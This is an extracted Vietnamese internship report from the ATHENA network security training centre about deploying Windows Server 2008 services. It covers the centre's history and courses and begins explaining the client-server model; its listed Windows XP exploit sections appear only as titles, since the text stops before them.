Bao cao cuoi ky

TRUNG TÂM ĐÀO TẠO QUẢN TRỊ MẠNG VÀ AN NINH MẠNGQUỐC TẾ
ATHENA

BÁO CÁO THỰC TẬP
CUỐI KHÓA
NGHIÊN CỨU VÀ TRIỂN KHAI CÁC DỊCH VỤ
MẠNG TRÊN WINDOWS SERVER 2008
Sinh viên thực hiện : Thái Văn Chương
MSSV : 468111007
Lớp : CĐN QUẢN TRỊ MẠNG MÁY TÍNH
GVHD : NGUYỄN VŨ DZŨNG
CBHD: : VÕ ĐỖ THẮNG
TP. Hồ Chí Minh, Tháng năm 2014.

NHIỆM VỤ THỰC HIỆN KHÓA LUẬN
Họ tên SV : Thái Văn Chƣơng. MSSV:468111007.
Chuyên ngành: Quản trị mạng máy tính.
Tên đề tài: Nghiên cứu triển khai các dịch vụ mạng trên Windows Server 2008.
Nội dung thực hiện:
Lý thuyết:
Nắmvững các bƣớc thực hiện quản trị Windows Server 2008.
Có khả năng tự thiết lập một mạng máy tính, cấu hình mạng, điều chỉnh khả năng hoạt động
mạng máy tính, vận hành hệ thống mạng, giải quyết sự cố, các phƣơng pháp bảo vệ trƣớc
nguy cơ virus, worm, trojan, spam.
Thực hành:
Cài đặt Windows Server 2008.
Nâng cấp Stand Alone thành Domain controller.
Cài đặt Windows 7.
Join Domain cho windows 7.
Tạo user account trên AD, thiết lập policy cho phép User đƣợc quyền thay đổi ngày giờ hệ
thống.
Backup cho Domain Controller.
Quản lý dịch vụ DNS,Mail,DHCP, Web, VPN trên môi trƣờng Local và Internet.
Thực hiện kết nối Mail Server, Web Server trên máy chủ ảo VPS.
Bảo mật Windows với khai thác mã lỗi trên Windows Xp (MS10_042,MS12_004,MS12_027
và lỗi Adobe Reader9.X)
Thời gian thực hiện: 10/02/2013 đến 24/5/2014.
Chữ ký của SV:
TP.HCM, Ngày 3 tháng 3 năm 2014.
GIÁM ĐỐC TRUNG TÂM GIẢNG VIÊN HƢỚNG DẪN
(Ký và ghi rõ họ tên) (Ký và ghi rõ họ tên)
TRUNG TÂM ĐÀO TẠO MẠNG & AN NINH
MẠNG QUỐC TẾ ATHENA
CỘNG HÒA XÃ HỘI CHỦ NGHĨA VIỆT NAM
Độc lập – Tự do – Hạnh phúc

LỜI CẢM ƠN
Trên thực tế không có sự thành công nào mà không gắn liền với những sự hỗ trợ, giúp đỡ dù
ít hay nhiều, dù trực tiếp hay gián tiếp. Trong suốt thời gian 3 năm ngồi trên ghế nhà trƣờng
và đƣợc sự đẫn dắt tận tình của thầy cô, em cùng các bạn sinh viên khác đã dần trƣởng thành
hơn và có kiến thức sâu rộng hơnđặc biệt trong học kỳ này nhà trƣờng đã tổ chức cho e đƣợc
thực tập ở bên ngoài mà theo em là rất hữu ích đối với sinh viên ngành Quản trị mạng máy
tính. Qua đó có thể giúp sinh viên chúng em có thêm kinh nghiệm thực tế, và trong kỳ thực
tập này e đã trƣởng thành hơn rất nhiều cả về kiến thức lẫn cách suy nghĩ về công việc trong
tƣơng lai của mình. Với lời biết ơn sâu sắc nhất, em xin gửi đến quý Thầy Cô ở Khoa Điện
Tử - Tin học Trƣờng Cao Đẳng kỹ thuật Cao Thắng đã cùng với tri thức và tâm huyết của
mình để truyền đạt vốn kiến thức quý báu cho chúng em trong suốt thời gian học tập tại
trƣờng. Em xin chân thành cảm ơn Thầy Võ Đỗ Thắng đã tận tâm hƣớng dẫn chúng em qua
từng buổi thực tập tại Trung Tâm ATHENA cũng nhƣ những buổi nói chuyện, thảo luận. Nếu
không có những lời hƣớng dẫn, dạy bảo của thầy thì em nghĩ bài báo cáo này của em rất khó
có thể hoàn thiện đƣợc. Một lần nữa, em xin chân thành cảm ơn thầy.
Bài báo cáo đƣợc thực hiện trong khoảng thời gian 3 tháng. Bƣớc đầu đi vào thực tế, tìm
hiểu, kiến thức của em còn hạn chế và còn nhiều bỡ ngỡ. Do vậy, không tránh khỏi những
thiếu sót là điều chắc chắn, em rất mong nhận đƣợc những ý kiến đóng góp quý báu của quý
Thầy Cô và các bạn học cùng lớp để kiến thức của em trong lĩnh vực này đƣợc hoàn thiện
hơn.
Sau cùng, em xin kính chúc quý Thầy Cô trong Khoa Điện Tử - Tin Học Trƣờng Cao Đẳng
Kỹ Thuật Cao Thắng,Trung Tâm Quản trị mạng và an ninh mạng Quốc Tế ATHENA và đặc
biệt là Thầy Võ Đỗ Thắng thật dồi dào sức khỏe, niềm tin để tiếp tục thực hiện sứ mệnh cao
đẹp của mình là truyền đạt kiến thức cho thế hệ mai sau.
Một lần nữa em xin chân thành cảm ơn.
TP.HCM, tháng 5năm 2014
Sinh viênthực hiện

NHẬN XÉT CỦA KHOA
..................................................................................................................................................
..................................................................................................................................................
..................................................................................................................................................
..................................................................................................................................................
..................................................................................................................................................
..................................................................................................................................................
..................................................................................................................................................
..................................................................................................................................................
..................................................................................................................................................
..................................................................................................................................................
..................................................................................................................................................
..................................................................................................................................................
..................................................................................................................................................
..................................................................................................................................................
..................................................................................................................................................
..................................................................................................................................................
..................................................................................................................................................
..................................................................................................................................................
..................................................................................................................................................
..................................................................................................................................................
..................................................................................................................................................
..................................................................................................................................................

NHẬN XÉT CỦA ĐƠN VỊ THỰC TẬP
..................................................................................................................................................
..................................................................................................................................................
..................................................................................................................................................
..................................................................................................................................................
..................................................................................................................................................
..................................................................................................................................................
..................................................................................................................................................
..................................................................................................................................................
..................................................................................................................................................
..................................................................................................................................................
..................................................................................................................................................
..................................................................................................................................................
..................................................................................................................................................
..................................................................................................................................................
..................................................................................................................................................
..................................................................................................................................................
..................................................................................................................................................
..................................................................................................................................................
..................................................................................................................................................
..................................................................................................................................................
..................................................................................................................................................
..................................................................................................................................................
..................................................................................................................................................
..................................................................................................................................................
..................................................................................................................................................
..................................................................................................................................................

Mục Lục
Chƣơng I. Tổng quan về công ty: .......................................................................1
1.1 Giới thiệu doanh nghiệp thực tập – Trung Tâm Đào Tạo Quản Trị
Mạng và An Ninh Mạng Quốc Tế ATHENA ................................................1
1.1.1 Trụ sở và các chi nhánh: ................................................................2
1.1.1.1 Trụ sở chính: ...........................................................................2
1.1.1.2 Cơ sở 2_Tại TP Hồ Chí Minh:................................................2
1.1.2 Quá trình hình thành và phát triển của trung tâm: .........................2
1.1.3 Cơ cấu tổ chức: ..............................................................................4
1.1.4 Các sản phẩm, giải pháp: ...............................................................4
1.1.4.1 Các khóa học dài hạn: .............................................................4
1.1.4.2 Các khóa học ngắn hạn: ..........................................................5
1.1.4.2.1 Khóa Quản trị mạng :.........................................................5
1.1.4.2.2 Khóa thiết kế web và bảo mật mạng..................................5
1.1.4.3 Các sản phẩm khác..................................................................5
1.1.4.4 Cơ sở hạ tầng...........................................................................5
1.1.4.5 Các dịch vụ hỗ trợ: ..................................................................6
1.1.5 Khách hàng.....................................................................................6
1.1.6 Đối tác............................................................................................6
Trung tâm đào tạo an ninh mạng ATHENA là đối tác đào tạo & cung
cấp nhân sự CNTT, .................................................................................6
1.2 Các nhiệm vụ và dịch vụ của bộ phận thực tập...................................6
1.3 Công việc và nhiệm vụ đƣợc phân công .............................................7
1.4 Thời gian thực tập................................................................................7
Chƣơng II. Nội dung thực tập .......................................................................8
2.1 Nhiệm vụ đƣợc giao ............................................................................8
2.2 Kiến thức tìm hiểu ...............................................................................8
2.2.1 Giải pháp mạng doanh nghiệp .......................................................8
2.2.1.1 Giới thiệu về mạng doanh nghiệp ...........................................8
2.2.1.2 Các thành phần công nghệ trong mạng doanh nghiệp ............8
2.2.2 Windows Server 2008....................................................................9

2.2.2.1 Giới thiệu về mô hình Client-Server......................................9
2.2.2.2 Giới thiệu về Windows Server 2008.....................................12
2.3 Các công nghệ đƣợc tiếp xúc, quá trình làm việc và các kiến thức ..15
2.3.1 Làm việc với Windows Server 2008 trên môi trƣờng máy ảo
VMWare....................................................................................................15
2.3.1.1.1 Cài đặt và cấu hình máy chủ Windows Server 2008 .......16
2.3.1.1.2 Khởi tạo cấu hình lần đầu tiên cho Windows Server 2008
25
2.3.1.1.3 Cài đặt dịch vụ DNS ........................................................35
2.3.1.1.4 Dịch Vụ DHCP ................................................................46
2.3.1.1.5 Cấu hình Web Server IIS. ................................................58
2.3.1.1.6 Mail Server.......................................................................66
2.3.1.1.7 Kết nối VPN.....................................................................78
2.3.2 Làm việc với Winsdows Server 2008 trên máy chủ ảo VPS
(Virtual private server)..............................................................................98
2.3.2.1 Mail Server trên máy chủ ảo VPS.......................................100
2.3.2.2 Kết Nối VPN thông qua máy chủ ảo VPS. .........................112
2.3.2.3 Cài đặt và cấu hình Web Server trên VPS. .........................132
2.3.3 Bảo mật Windows......................................................................143
2.3.3.1 Khai thác lỗ hổng trên Windows XP với mã lỗi MS10_042
143
2.3.3.2 Khai thác lỗ hổng bảo mật Win XP mã lỗi MS12_004.......148
2.3.3.3 Khai thác lỗ hổng trên Win XP với lỗi Adobe Reader 9.X.154
2.3.3.4 Khai thác lỗ hổng trên Win XP với mã lỗi MS12_027.......159
2.4 Các kết quả đạt đƣợc .......................................................................164
2.4.1 Kinh nghiệm thực tế...................................................................164
2.4.2 Hoàn thiện bản thân ...................................................................165
2.4.3 Các kiến thức đƣợc lĩnh hội .......................................................165
Chƣơng III. Kết Luận .................................................................................166
Chƣơng IV. Tài liệu tham khảo ..................................................................168

LỜI MỞ ĐẦU
Ngày nay với sự phát triển của khoa học kỹ thuật thì máy tính trở nên
phổ biến với mọi ngƣời. Chúng mang lại cho con ngƣời khả năng to lớn và
làm những công việc phi thƣờng: tính toán nhanh và chính xác các bài toán
phức tạp, điều khiển tự động, giải trí… Máy tính ra đời không chỉ hỗ trợ trong
sản xuất mà còn trong việc học tập và làm góp phần giải phóng sức lao động.
Máy tính điện tử là một phát minh, thành tựu to lớn cho sự phát triển của nhân
loại góp phần thúc đẩy mạnh mẽ tiến bộ khoa học và kỹ thuật nói riêng cũng
nhƣ nhân loại nói chung.
Bên cạnh sự phát triển chóng mặt của máy tính trong thời buổi công
nghệ thông tin thì các ứng dụng, dịch vụ mạng là nền tản không thể tách rời.
Sức mạnh máy tính có thể nhân lên gấp nhiều lần khi đƣợc kết nối thành mạng
máy tính. Là cơ sở hạ tần cho phép trao đổi thông tin, truyền tải dữ liệu từ xa
nhằm rút ngắn khoảng cách. Với mạng máy tính toàn cầu chúng ta dễ dàng
tiếp cận với sự phát triển của thế giới trong đó có sự phát triển gần nhất của
Windows Server là Windows Server 2000 và Windows Server 2003 và tiếp
đến là Windows Server 2008 hỗ trợ tốt các dịch vụ mạng cần thiết trên Server,
việc cải tiến không ngừng giúp nâng cao tính ổn định và an toàn hơn cho
Windows Server 2008 hoạt động một cách trơn tru.
Hiện nay quá trình công nghiệp hóa hiện đại hóa đất nƣớc là một chủ
trƣơng hàng đầu của nhà nƣớc. Mạng máy tính trở thành mục tiêu nghiên cứu
và phát triển. Cốt lõi là ngành công nghệ thông tin bao gồm nhiều lĩnh vực từ
kiến trúc mạng đến nguyên lý thiết kế, cài đặt mô hình ứng dụng v.v… Mạng
viễn thông nói chung và mạng máy tính trên nền tảng Windows Server 2008
nói riêng là công cụ hũu dụng không thể thiếu trong bộ máy nhà nƣớc, trƣờng
học, doanh nghiệp… Nó đóng vai trò cầu nối trao đổi thông tin giữa các chính
phủ, tổ chức xã hội và mọi ngƣời với nhau.
Qua thời gian học tập và nghiên cứu trên ghế nhà trƣờng cùng với sự hỗ
trợ tận tình của Thầy cô, bạn bè và ngƣời thân đã giúp em thu thập đƣợc nhiều
kiến thức quý báu. Đặc biệt là quá trình thực tập tại Trung tâm ATHENA giúp
em có những trải nghiệm vô cùng thú vị và bổ ích. Với mong muốn tìm hiểu
về mạng máy tính và góp phần xây dựng một mạng máy tính thân thiện, thông
minh cho mọi ngƣời sử dụng.
Tuy đã có nhiều cố gắng song không thể tránh những khuyết điểm, sai
sót vì thế mong đƣợc sự thông cảm và những ý kiến đóng góp quý báo từ Quý
Thầy Cô, bạn bè, bạn đọc, ngƣời thân để em có thể ngày một hoàn thiện bản
thân mình hơn. Xin chân thành cảm ơn!

1
SVTT: Thái Văn Chƣơng
Chương I. Tổng quan về công ty:
1.1 Giới thiệu doanh nghiệp thực tập – Trung Tâm Đào Tạo Quản Trị Mạng
và An Ninh Mạng Quốc Tế ATHENA
Trung Tâm Đào Tạo Quản Trị Mạng và An Ninh Mạng Quốc Tế
ATHENA_Tiền thân là Công ty TNHH Tƣ vấn và Đào tạo quản trị mạng Việt
Năng, (tên thƣơng hiệu viết tắt là TRUNG TÂM ĐÀO TẠO ATHENA),
đƣợc chính thức thành lập theo giấy phép kinh doanh số 4104006757 của Sở
Kế Hoạch Đầu Tƣ Tp Hồ Chí Minh cấp ngày 04 tháng 11 năm 2008.
Tên công ty viết bằng tiếng nƣớc ngoài: ATHENA
ADVICE TRAINING NETWORK SECURITY COMPANY LIMITED.
ATHENA là một tổ chức quy tụ nhiều trí thức trẻ Việt Nam đầy năng
động, nhiệt huyết và kinh nghiệm trong lĩnh vực công nghệ thông tin. Với
quyết tâm góp phần vào công cuộc thúc đẩy tiến trình tin học hóa của nƣớc
nhà. ATHENA đã và đang tập trung chủ yếu vào các họat động sau:
 Đào tạo chuyên sâu quản trị mạng, an ninh mạng, thƣơng mại điện tử theo
các tiêu chuẩn quốc tế của các hãng nổi tiếng nhƣ Microsoft, Cisco, Oracle,
Linux LPI , CEH,... Song song đó, trung tâm ATHENA còn có những chƣơng
trình đào tạo cao cấp dành riêng theo đơn đặt hàng của các đơn vị nhƣ Bộ
Quốc Phòng, Bộ Công An , ngân hàng, doanh nghiệp, các cơ quan chính phủ,
tổ chức tài chính..Qua đó cung cấp nguồn nhân lực trong lĩnh vực công nghệ
thông tin, đặc biệt là chuyên gia về mạng máy tính và bảo mật mạng đạt trình
độ quốc tế cho các tổ chức, doanh nghiệp có nhu cầu.
 Tƣ vấn và hổ trợ cho doanh nghiệp ứng dụng hiệu quả tin học vào hoạt động
sản xuất kinh doanh.
 Tiến hành các hoạt động nghiên cứu nâng cao kiến thức tin học và phát triển
cơ sở dữ liệu thông tin về các ứng dụng và sự cố mạng.
 Tiến hành các dịch vụ ứng cứu khẩn cấp cho doanh nghiệp trong trƣờng hợp
xảy ra sự cố máy tính.
Sau gần 10 năm hoạt động,nhiều học viên tốt nghiệp trung
tâm ATHENA đã là chuyên gia đảm nhận công tác quản lý hệ thống mạng, an
ninh mạng cho nhiều bộ ngành nhƣ Cục Công Nghệ Thông Tin - Bộ Quốc
Phòng , Bộ Công An, Sở Thông Tin Truyền Thông các tỉnh, bƣu điện các
tỉnh,…

2
Ngoài ra, Trung tâm ATHENA còn có nhiều chƣơng trình hợp tác và trao
đổi công nghệ với nhiều trƣờng đại học lớn nhƣ đại học Bách Khoa Thành
Phố Hồ Chí Minh, HọcViệnAn Ninh Nhân Dân( Thủ Đức), Học Viện Bƣu
Chính Viễn Thông, Hiệp hội an toàn thông tin (VNISA), Viện Kỹ Thuật Quân
Sự...
1.1.1 Trụ sở và các chi nhánh:
1.1.1.1 Trụ sở chính:
Trung Tâm Đào Tạo Quản Trị Mạng và An Ninh Mạng Quốc Tế ATHENA.
Số 2 Bis Đinh Tiên Hoàng, Phƣờng Đa Kao, Tp Hồ Chí Minh, Việt Nam.
Điện thoại: ( 84-8 ) 3824 4041
Hotline: 0943 23 00 99
1.1.1.2 Cơ sở 2_Tại TP Hồ Chí Minh:
Trung Tâm Đào Tạo Quản Trị Mạng và An Ninh Mạng Quốc Tế ATHENA
92 Nguyễn Đình Chiểu ,Phƣờng Đa Kao,Quận 1, Tp Hồ Chí Minh, Việt Nam.
Website: www.Athena.Edu.Vn
Điện thoại: ( 84-8 ) 2210 3801
Hotline: 0943 20 00 88
1.1.2 Quá trình hình thành và phát triển của trung tâm:
 Một nhóm các thành viên là những doanh nhân tài năng và thành công
trong lĩnh vực công nghệ thông tin đã nhận ra tiềm năng phát triển của việc
đào tạo nền công nghệ thông tin nƣớc nhà. Họ là những cá nhân có trình độ
chuyên môn cao và có đầu óc lãnh đạo cùng với tầm nhìn xa về tƣơng lai của
ngành công nghệ thông tin trong tƣơng lai, họ đã quy tụ đƣợc một lực lƣợng
lớn đội ngũ công nghệ thông tin trƣớc hết là làm nhiệm vụ ứng cứu máy tính
cho các doanh nghiệp, cá nhân có nhu cầu. Bƣớc phát triển tiếp theo là vƣơn
tầm đào đạo đội ngũ cán bộ công nghệ thông tin cho đất nƣớc và xã hội.
 Các thành viên sáng lập trung tâm gồm:
o Ông Nguyễn Thế Đông: Cựu giám đốc trung tâm ứng cứu máy tính Athena,
hiện tại là giám đốc dự án của công ty Siemen Telecom.
o Ông Hứa Văn Thế Phúc: Phó Giám đốc Phát triển Thƣơng mại Công ty EIS,
Phó Tổng công ty FPT.
o Ông Nghiêm Sỹ Thắng: Phó Tổng giám đốc Ngân hàng Liên Việt, chịu trách
nhiệm công nghệ thông tin của Ngân hàng.
o Ông Võ Đỗ Thắng: Hiện đang là giám đốc Trung tâm đào tạo quản trị và an
ninh mạng Athena.

3
 Đến năm 2003, bốn thành viên sáng lập cùng với với đội ngũ ứng cứu
máy tính gần 100 thành viên hoạt động nhƣ là một nhóm, một tổ chức ứng cứu
máy tính miền Nam.
 Từ năm 2004- 2006: Trung tâm có nhiều bƣớc phát triển và chuyển
mình. Trung tâm trở thành một trong những địa chỉ tin cậy của nhiều doanh
nghiệp nhằm cài đặt hệ thống an ninh mạng và đào tạo cho đội ngũ nhân viên
của các doanh nghiệp về các chƣơng trình quản lý dự án MS Project 2003, kỹ
năng thƣơng mại điện tử, bảo mật web… và là địa chỉ tin cậy của nhiều học
sinh_sinh viên đến đăng kí học. Đòi hỏi cấp thiết trong thời gian này của
Trung tâm là nâng cao hơn nữa đội ngũ giảng viên cũng nhƣ cơ sở để đáp ứng
nhu cầu ngày càng cao về công nghệ thông tin của đất nƣớc nói chung, các
doanh nghiệp, cá nhân nói riêng.Năm 2004, công ty mở rộng hoạt động cung
cấp giải pháp, dịch vụ cho khu vực miền Trung thông qua việc thành lập văn
phòng đại diện tại Đà Nẵng.
 Đến năm 2006: Trung tâm đào tạo quản trị và an ninh mạng Athena
mở ra thêm một chi nhánh tại Cƣ xá Nguyễn Văn Trỗi. Đồng thời tiếp tục
tuyển dụng đội ngũ giảng viên là những chuyên gia an ninh mạng tốt nghiệp
các trƣờng đại học và học viện công nghệ thông tin uy tín trên toàn quốc, đồng
thời trong thời gian này Athena có nhiều chính sách ƣu đãi nhằm thu hút đội
ngũ nhân lực công nghệ thông tin lành nghề từ các doanh nghiệp, tổ chức, làm
giàu thêm đội ngũ giảng viên của trung tâm.
 Đến năm 2008: Hàng loạt các trung tâm đào tạo quản trị và an ninh
mạng mọc lên, cùng với khủng hoảng kinh tế tài chính toàn cầu đã làm cho
Trung tâm rơi vào nhiều khó khăn. Ông Nguyễn Thế Đông cùng Ông Hứa
Văn Thế Phúc rút vốn khỏi công ty gây nên sự hoang man cho toàn bộ hệ
thống trung tâm. Cộng thêm chi nhánh tại Cƣ xã Nguyễn Văn Trỗi hoạt động
không còn hiệu quả phải đóng cửa làm cho trung tâm rơi từ khó khăn này đến
khó khăn khác. Lúc này, với quyết tâm khôi phục lại công ty cũng nhƣ tiếp tục
sứ mạng góp phần vào tiến trình tin học hóa của đất nƣớc. Ông Võ Đỗ Thắng
mua lại cổ phần của hai nhà đầu tƣ lên làm giám đốc và xây dựng lại trung
tâm. Đây là một bƣớc chuyển mình có ý nghĩa chiến lƣợc của trung tâm. Mở
ra một làn gió mới và một giai đoạn mới, cùng với quyết tâm mạnh mẽ và một

4
tinh thần thép đãgiúp ông Thắng vƣợt qua nhiều khó khăn ban đầu, giúp trung
tâm đứng vững trong thời kì khủng hoảng.
 Từ năm 2009 – nay: Cùng với sự lãnh đạo tài tình và đầu óc chiến
lƣợc. Trung tâm đào tạo quản trị và an ninh mạng dần đƣợc phục hồi và trở lại
quỹ đạo hoạt động của mình. Đến nay, Trung tâm đã trở thành một trong
những trung tâm đào tạo quản trị mạng hàng đầu Việt Nam. Cùng với sự liên
kết của rất nhiều công ty, tổ chức doanh nghiệp, trung tâm trở thành nơi đào
tạo và cung cấp nguồn nhân lực công nghệ thông tin cho xã hội. Từng bƣớc
thực hiện mục tiêu góp phần vào tiến trình tin học hóa nƣớc nhà.
1.1.3 Cơ cấu tổ chức:
Hình 1.1 Sơ đồ tổ chức công ty
1.1.4 Các sản phẩm, giải pháp:
1.1.4.1 Các khóa học dài hạn:
- Chƣơng trình đào tạo chuyên gia an ninh mạng. ( AN2S) Athena network
security specialist.
- Chƣơng trình Quản trị viên an ninh mạng (ANST) Athena netuwork security
Technician.

5
- Chuyên viên quản trị mạng nâng cao (ANMA) Athena network manager
Administrator.
1.1.4.2 Các khóa học ngắn hạn:
1.1.4.2.1 Khóa Quản trị mạng :
- Quản trị mạng Microsoft căn bản ACBN
- Phần cứng máy tính, laptop, server
- Quản trị hệ thống mạng Microsoft MCSA Security.
- Quản trị mạng Microsoft nâng cao MCSE
- Quản trị window Vista
- Quản trị hệ thống Window Server 2008, 2012
- Lớp Master Exchange Mail Server
- Quản trị mạng quốc tế Cissco CCNA
- Quản trị hệ thống mạng Linux 1 và Linux 2.
1.1.4.2.2 Khóa thiết kế web và bảo mật mạng
- Xây dựng, quản trị web thƣơng mại điện tử với Joomla và VirtuMart
- Lập trình web với Php và MySQL
- Bảo mật mạng quốc tế ACNS
- Hacker mũ trắng
- Athena Mastering Firewall Security
- Bảo mật website.
1.1.4.3 Các sản phẩm khác
- Chuyên đề thực hành sao lƣu và phục hồi dữ liệu
- Chuyên đề thực hành bảo mật mạng Wi_Fi
- Chuyên đề Ghost qua mạng
- Chuyên đề xây dựng và quản trị diễn đàn
- Chuyên đề bảo mật dữ liệu phòng chống nội gián
- Chuyên đề quản lý tài sản công nghệ thông tin
- Chuyên đề kỹ năng thƣơng mại điện tử.
1.1.4.4 Cơ sở hạ tầng
- Thiết bị đầy đủ và hiện đại.

6
- Chƣơng trình cập nhật liên tục, bảo đảm học viên luôn tiếp cận với những
công nghệ mới nhất.
- Phòng máy rộng rãi, thoáng mát.
1.1.4.5 Các dịch vụ hỗ trợ:
- Đảm bảo việc làm cho học viên tốt nghiệp khoá dài hạn
- Giới thiệu việc làm cho mọi học viên
- Thực tập có lƣơng cho học viên khá giỏi
- Ngoài giờ học chính thức, học viên đƣợc thực hành thêm miễn phí, không giới
hạn thời gian
- Hỗ trợ kỹ thuật không thời hạn trong tất cả các lĩnh vực liên quan đến máy
tính, mạng máy tính, bảo mật mạng
- Hỗ trợ thi Chứng chỉ Quốc tế
1.1.5 Khách hàng
- Mọi đối tƣợng chuyên hoặc không chuyên về CNTT.
- Khách hàng chủ yếu của ATHENAlà các bạn học sinh, sinh viên và các cán
bộ công nhân viên chức yêu thích lĩnh vực công nghệ thông tin.
1.1.6 Đối tác
Trung tâm đào tạo an ninh mạng ATHENA là đối tác đào tạo & cung cấp nhân
sự CNTT, quản trị mạng , an ninh mạng chất lƣợng cao theo đơn đặt hàng cho
các đơn vị nhƣ ngân hàng, doanh nghiệp, các cơ quan chính phủ, tổ chức tài
chính...
1.2 Các nhiệm vụ và dịch vụ của bộ phận thực tập
Bộ phận thực tập : Bộ phận triển khai kỹ thuật.
Nhiệm vụ và dịch vụ:
 Triển khai lắp đặt hệ thống mạng.
 Bảo trì hệ thống mạng.
 Tƣ vấn hỗ trợ quản trị hệ thống mạng.

7
1.3 Công việc và nhiệm vụ được phân công
 Nghiên cứu các dịch vụ mạng trên Windows Server 2008.
 Triển khai các dịch vụ mạng trên Windows Server 2008.
 Yêu cầu nhiệm vụ: Có kiến thức tốt về Network, System, Security.
1.4 Thời gian thực tập
Từ ngày 10/02/2013 đến ngày 24/5/2014.

8
Chương II. Nội dung thực tập
2.1 Nhiệm vụ được giao
 Nghiên cứu các dịch vụ mạng trên Windows Server 2008
 Triển khai các dịch vụ mạng trên Windows Server 2008
2.2 Kiến thức tìm hiểu
2.2.1 Giải pháp mạng doanh nghiệp
2.2.1.1 Giới thiệu về mạng doanh nghiệp
Hệ thống mạng của doanh nghiệp đơn giản hay phức tạp là tùy theo quy mô và
loại hình của doanh nghiệp. Ngày nay, các nhà cung ứng đã đƣa ra rất nhiều
sự chọn lựa cho doanh nghiệp nhƣ cho phép doanh nghiệp tự trang bị, tự quản
lý hoặc sử dụng dịch vụ. Những doanh nghiệp lớn với hàng ngàn máy tính
cũng có những giải pháp quản lý đặc thù kết hợp cả phần cứng và phần mềm.
Hầu hết các doanh nghiệp đều có nhu cầu sử dụng các ứng dụng công nghệ
thông tin (CNTT) ở những mức độ khác nhau. Do vậy, họ sẽ có những nhu
cầu khác nhau về quản trị hệ thống mạng (network) của doanh nghiệp. Một hệ
thống đƣợc kiểm soát tốt sẽ làm giảm đáng kể chi phí hoạt động, nâng cao
hiệu quả cũng nhƣ độ tin cậy của hệ thống.
2.2.1.2 Các thành phần công nghệ trong mạng doanh nghiệp
Tùy vào qui mô lớn hay nhỏ của doanh nghiệp mà ta sẽ có những giải pháp
công nghệ và thiết kế sao cho phù hợp nhất.
Hiện nay, hầu hết các ứng dụng mới đều yêu cầu rất nhiều tài nguyên của hệ
thống và băng thông mạng, cũng nhƣ các yêu cầu về điều khiển, giám sát
mạng. Vậy làm thế nào để một doanh nghiệp vừa và nhỏ, với một số vốn đầu
tƣ ban đầu hạn chế, có thể tiếp cận đƣợc với các công nghệ hiện đại, bắt kịp sự
phát triển của thế giới.

9
2.2.2 Windows Server 2008
2.2.2.1 Giới thiệu về mô hình Client-Server
Điều đáng ngạc nhiên là nhiều công ty ngày nay vẫn không quan tâm đến việc
thực hiện một mạng lƣới client/server. Thay vào đó họ chỉ tiếp tục thêm vào
các máy trạm để thực hiện mô hình mạng peer-to-peer. Mạng peer-to-peer
không cung cấp cho bạn nhiều cách bảo mật và chia sẽ tài nguyên. Vì vậy,
không có gì ngạc nhiên khi họ thƣờng có vấn đề với việc truy cập vào máy
trạm, bị mất dữ liệu do virus, spyware hay phải trải nghiệm việc internet bị
gián đoạn. Máy tính nối mạng theo mô hình peer-to-peer là đủ khi bạn chỉ có
một vài ngƣời dung trên mạng, nhƣng khi có nhiều hơn 5 hoặc 6 ngƣời sử
dụng trên mạng của bạn, bạn thực sự phải xem xét đầu tƣ một máy chủ mạng.
Vậy lợi ích của mô hình Client-Server cụ thể là gì?
- Tập tin và an ninh mạng: Vai trò quan trọng nhất của một máy chủ tập tin là
an ninh mạng mà nó cung cấp. Bằng cách tạo ra các tài khoản ngƣời dùng cá
nhân và nhóm, có thể cấp quyền cho nhóm và cá nhân khai thác dữ liệu đƣợc
lƣu trữ trên mạng, ngăn chặn ngƣời sử dụng trái phép truy cập tài liệu mà họ
không nên xem. Ví dụ, trong Folder chung thì group ketoan và group nhansu
cóquyền truy cập của nhân viên…

10
-
Hình 1.2 Cấu hình NTFS Permission
- Tăng độ tin cậy, giảm sự gián đoạn công việc: Nhiều máy chủ đƣợc trang bị
nguồn điện dự phòng. Với một nguồn cung cấp năng lƣợng thứ cấp chạy song
song, sự mất mát của một trong những nguồn cung cấp điện không ảnh hƣởng
đến hoạt động hệ thống bình thƣờng. Cũng vậy với hệ thống lƣu trữ của máy
chủ. Không giống nhƣ một máy tính để bàn trung bình có sử dụng một ổ cứng
duy nhất, một máy chủ sẽ thƣờng sử dụng nhiều ổ đĩa cứng làm việc trong một
RAID cấu hình để ngăn ngừa mất dữ liệu hoặc một sự gián đoạn trong quy
trình làm việc. Ngoài ra, nhiều máy chủ cũng đƣợc trang bị ổ đĩa cứng hot
swappable và nguồn cung cấp điện. Các thành phần này có thể thay thế nóng
cho phép bạn thay thế phần cứng bị lỗi mà không gián đoạn toàn bộ văn
phòng. Ngoài ra, kể từ khi tất cả các dữ liệu nhân viên đang đƣợc lƣu trữ trên
mạng, nếu máy trạm của ngƣời dùng không giữa ngày làm việc, nhân viên có
thể truy cập các tập tin tƣơng tự từ máy trạm khác.

11
- Tập trung lưu trữ dữ liệu và tài nguyên chia sẻ: Với một máy chủ mạng, tất
cả ngƣời dùng trên mạng có thể sử dụng các tài nguyên mạng khác nhau ngay
từ bàn làm việc, tăng hiệu quả. Một số trong những nguồn tài nguyên bao
gồm:
o Tập trung lƣu trữ dữ liệu ( RAID Array )
o Network Attached Storage (NAS) thiết bị
o Tháp đĩa CD / DVD
o Máy in và máy chủ Fax
- Quản lý virus :Một trong những mối đe dọa lớn nhất đối với mạng của bạn là
khả năng lây nhiễm từ virus, phần mềm gián điệp và thƣ rác. Vì vậy, có tốt,
cập nhật, phần mềm chống virus đƣợc cài đặt trên hệ thống của bạn là một
điều cần thiết. Trong một văn phòng của 10 ngƣời hoặc ít hơn, hệ thống có thể
đƣợc duy trì riêng. Bất cứ điều gì nhiều hơn thế, tuy nhiên, có thể trở thành
một gánh nặng thực sự. Trong những trƣờng hợp này, một gói phần mềm
chống virus kết hợp máy trạm và bảo vệ chống virus máy chủ vào một giải
pháp duy nhất có ý nghĩa hơn.
- Sao lưu tập trung: Tất cả các doanh nghiệp nên sao lƣu dữ liệu của họ một
cách thƣờng xuyên. Bởi có tất cả các công ty của bạn và dữ liệu nhân viên
đƣợc lƣu trữ tại một địa điểm, bản sao lƣu có thể đƣợc thực hiện đáng tin cậy
và nhanh chóng. Vì vậy, bạn sẽ không bao giờ cần phải lo lắng về những dữ
liệu đƣợc lƣu trữ trên những gì máy trạm nhƣ bạn làm trong một mạng peer-
to-peer. Ngày nay, hầu hết các loại phƣơng tiện truyền thông có thể đƣợc sử
dụng cho mục đích sao lƣu. Ngoài các ổ đĩa truyền thống băng, đĩa CD, DVD,
lƣu trữ và thậm chí loại bỏ Network Attached Storage (NAS) thiết bị này là
